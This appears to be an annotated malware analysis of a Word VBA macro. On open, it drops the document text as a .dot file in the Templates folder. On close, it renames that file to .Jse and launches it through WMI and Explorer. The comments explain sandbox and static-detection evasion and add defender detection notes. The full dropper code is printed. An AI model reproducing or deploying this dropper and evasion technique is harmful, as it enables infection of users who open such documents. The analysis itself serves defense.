' Annotated macro taken from a Word document/template (VBA; the file's language hint is wrong).
' The code is reproduced exactly as found on the page; only comments were added or reworded.
' Visible control flow in this listing:
'   Document_Open  -> saveFile Deza, saveFile Deza & "u"   (two plain-text copies of the document are written)
'   Document_Close -> AddToTheAutoCorrectList               (the .dot copy is renamed .Jse and launched through WMI)
' No Option Explicit appears here, so the undeclared names newMalFilePath, p, res and pid compile silently as Variants.
Private malFilePath As String ' Module-level path of the dropped file; assigned in Deza, consumed by AddToTheAutoCorrectList

' Decoy function: nothing is ever assigned to Repl, so it returns the Boolean default (False) on every call.
' The If block has an empty body, so its only effect is reading r.Text. Parameters a and r1 are never used.
' NOTE(review): together with the unused Dims below, this looks like padding/obfuscation — judge by the sample, not by this comment.
Private Function Repl(a As AutoCorrectEntries, r As Range, r1 As Range) As Boolean
    If "jikol" <> r.Text Then
    End If
    ' Always returns false
End Function

' Runs from Document_Close. Despite its name, the AutoCorrect work is dead code (see the Repl note);
' the live statements are the four after the loop: rename the dropped .dot to .Jse and start it via Win32_Process.Create.
Sub AddToTheAutoCorrectList()
    Dim r As Range, r1 As Range
    Dim par As Paragraph, bo As Boolean
    Dim pars As Paragraphs
    Dim ACE As AutoCorrectEntry ' Unused in this Sub
    Dim ACEs As AutoCorrectEntries
    Dim ActD As Document
    Dim FerD As String ' Unused in this Sub
    Dim Polk As String ' Unused in this Sub
    Set ActD = ActiveDocument ' This is the file /word/document.xml
    Set pars = ActD.Paragraphs ' Represents the list of paragraphs of said file
    Set r1 = Selection.Range
    Set r = Selection.Range
    Set ACEs = Application.AutoCorrect.Entries
    On Error Resume Next ' From here on every runtime error is swallowed: a failed rename or WMI call does not stop the macro
    For Each par In pars ' Iterate over the paragraphs of the document (/word/document.xml file)
        r1.Start = par.Range.Start
        r1.End = r1.Start
        r1.MoveEndUntil vbTab ' Select text until the vbTab character
        r.Start = r1.End + 1 ' The next range begins 1 char after the first range
        r.End = par.Range.End - 1 ' And ends one character before the paragraph ends
        If Len(r1.Text) > 0 Or Len(r.Text) > 0 Then ' Check if there is text in either of the two ranges
            If Len("jkopft") > 0 Then ' This always evaluates to True
                bo = Repl(ACEs, r, r1) ' This always evaluates to False
            Else
                bo = True ' This else part will never be executed
            End If
            If bo Then ACEs.Add r1.Text, r.Text ' Never gets executed
        End If
    Next ' Author's note: only one iteration of the loop takes place. NOTE(review): no Exit For is visible here, so confirm this against the sample
    ' Live part of the routine starts here.
    newMalFilePath = Replace(malFilePath, ".dot", ".Jse") ' replaces the .dot in the string containing the path to the 2angola.dot file with .jse
    Name malFilePath As newMalFilePath ' Renames the malware file "C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.dot" to "C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.jse"
    Set p = GetObject("winmgmts:Win32_Process") ' Creates an object to start processes from vba
    res = p.Create("Explorer """ & newMalFilePath & """", Null, Null, pid) ' The string evaluates to
    ' 'Explorer "C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.jse"'
    ' This will start the explorer to start the jse file. In most windows installations the jse file extension will be executed with the windows script host by default
    ' By using only the Explorer to run the file, you can circumvent detection by static analysis. Calling "Wscript.exe" is way more obvious
    ' Changing the default program to open jse files will protect you from this specific attack
    ' Defender notes (review):
    '  - Because the launch goes through Win32_Process.Create, the new process is not a direct child of WINWORD.EXE,
    '    so "Office spawned a child process" detections may not fire; alert on WMI process creation requested by an
    '    Office process and on explorer.exe / the script host opening a .jse from the user's Templates folder instead.
    '  - The rename of a .dot to .Jse under the Templates path above (Name ... As ...) is a file-event indicator on its own.
    '  - Blocking macros from untrusted documents prevents both event handlers from running at all; the .jse
    '    re-association the author mentions only narrows this one launch path. Office's AMSI scanning of VBA,
    '    where enabled, may also surface the GetObject("winmgmts:...") call at runtime — verify in your environment.
End Sub

' Builds the drop path: the attached template's directory plus "\2angola.dot".
' Side effect: overwrites the module-level malFilePath on every call (Document_Open calls it twice).
' No return type is declared, so Deza returns a Variant holding the same string.
Private Function Deza()
    ' Reads the template path of the current document and appends "/2angola.dot" to it
    malFilePath = ActiveDocument.AttachedTemplate.Path & "\2angola.dot"
    Deza = malFilePath ' return value
End Function

' Saves the current document as plain text (wdFormatText) under the given name.
' Author's note: this is where /word/document.xml gets transformed to ascii only and stored on disk.
' Defender note (review): with the paths used in this sample the write lands in the user's Templates folder at open time;
' WINWORD writing a .dot there immediately after a document opens is the earliest observable step of this chain.
Private Sub saveFile(filename As String)
    ' Creates a file with the passed file name
    ActiveDocument.SaveAs FileName:=filename, FileFormat:=wdFormatText, LockComments:=False, Password:="", AddToRecentFiles:=False, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, SaveNativePictureFormat:=False, SaveFormsData :=False, SaveAsAOCELetter:=False, InsertLineBreaks:= False, AllowSubstitutions:=False, LineEnding:=wdCRLF
End Sub

' Close-event handler: the stage that actually executes something. Analysis environments that never close the
' document will not reach this code, which matches the author's remark about sandboxes in Document_Open.
Private Sub Document_Close()
    ' Will be executed when the word document is being closed
    ' When closing the document the function fills the recently created files with malicious contents
    ' This is where the infection starts taking place
    AddToTheAutoCorrectList
End Sub

' Open-event handler: drops two plain-text copies of the document. The ".dotu" copy is not referenced again anywhere in this listing.
' NOTE(review): the author calls the files "empty", but SaveAs with wdFormatText writes whatever text the document body
' holds — presumably the script that is later run as .jse. Inspect the dropped files rather than relying on this comment.
Private Sub Document_Open()
    ' Will be executed when the word document is being opened
    saveFile Deza ' Creates a text-only copy of document.xml with the name returned by the function "Deza"
    saveFile Deza & "u" ' Creates a text-only copy of document.xml with the name returned by the function "Deza" and appends a "u" to it
    ' Results are two new files were created:
    ' C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.dot
    ' C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.dotu
    ' Until here nothing bad happened. The computer is not really infected by anything. Only two empty files were created.
    ' If not executed manually until this point, the owner is "safe"
    ' Only when the document will be closed those files will be executed. This is also one of the main reasons why sandboxes
    ' do not detect this kind of vba very well, since most sandboxes won't close the document
End Sub